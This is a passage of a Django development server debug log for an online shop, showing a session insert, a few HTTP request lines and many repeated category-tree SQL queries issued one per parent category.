4252 140031482124032 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '4qqz0yrnic558qvetuq9u660qnibsk2o' LIMIT 1; args=('4qqz0yrnic558qvetuq9u660qnibsk2o',) DEBUG 2019-12-19 09:40:10,530 utils 4252 140031482124032 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('4qqz0yrnic558qvetuq9u660qnibsk2o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-02T09:40:10.529405+00:00'::timestamptz); args=('4qqz0yrnic558qvetuq9u660qnibsk2o', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 2, 9, 40, 10, 529405, tzinfo=)) [19/Dec/2019 09:40:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [19/Dec/2019 09:42:44] "GET / HTTP/1.0" 302 0 [19/Dec/2019 09:47:47] "GET / HTTP/1.0" 302 0 [19/Dec/2019 09:53:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 09:57:55,359 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 09:57:55,366 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 09:57:55,370 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 09:57:55,372 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 09:57:55,376 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 09:57:55,378 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 09:57:55,381 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 09:57:55,383 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 09:57:55,385 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 09:57:55,389 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 09:57:55,392 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 09:57:55,394 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 09:57:55,397 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 09:57:55,399 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 09:57:55,402 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 09:57:55,405 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 09:57:55,407 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 09:57:55,410 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 09:57:55,413 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 09:57:55,417 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 09:57:55,419 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 09:57:55,422 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 09:57:55,425 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 09:57:55,428 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 09:57:55,430 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 09:57:55,434 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 09:57:55,437 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 09:57:55,439 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 09:57:55,442 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 09:57:55,444 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 09:57:55,448 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 09:57:55,451 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 09:57:55,454 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 09:57:55,457 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 09:57:55,461 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 09:57:55,466 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 09:57:55,469 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 09:57:55,472 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 09:57:55,475 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 09:57:55,479 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 09:57:55,482 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 09:57:55,486 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 09:57:55,489 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 09:57:55,493 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 09:57:55,496 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 09:57:55,500 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 09:57:55] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 09:58:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 09:58:45,330 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 09:58:45,337 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 09:58:45,340 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 09:58:45,342 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 09:58:45,346 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 09:58:45,348 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 09:58:45,350 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 09:58:45,353 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 09:58:45,355 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 09:58:45,359 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 09:58:45,361 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 09:58:45,363 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 09:58:45,365 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 09:58:45,367 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 09:58:45,371 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 09:58:45,373 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 09:58:45,375 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 09:58:45,377 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 09:58:45,379 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 